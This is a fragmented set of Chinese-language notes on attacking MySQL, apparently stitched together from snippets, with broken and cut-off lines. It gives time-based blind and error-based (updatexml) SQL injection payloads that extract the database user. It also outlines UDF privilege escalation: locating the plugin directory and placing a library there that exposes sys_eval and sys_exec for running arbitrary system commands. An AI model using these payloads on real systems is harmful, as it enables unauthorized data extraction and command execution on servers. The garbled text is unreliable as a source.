if(mid(user(),1,1)='r',sleep(2),1);
and updatexml(1,mid(concat(0x7e,user()),1,5),1)
group by语句:结合聚合函数使用...执行系统命令
system 执行格式:
mysql> system
UDF提权执行系统命令:
UDF是MySQL用户自定义的函数,
要求:
plugin目录具备读写权限...查看系统和MySQL架构
select @@version_compile_os , @@version_compile_machine ;
?...UDF库需要放在MySQL的plugin文件中
select @@plugin_dir;
?
?...的plugin目录下;
UDF支持的函数:
sys_eval 执行任意命令,并返回他的输出
sys_exec 执行任意命令,并返回他的退出代码
sys_get 获取环境变量的值
sys_set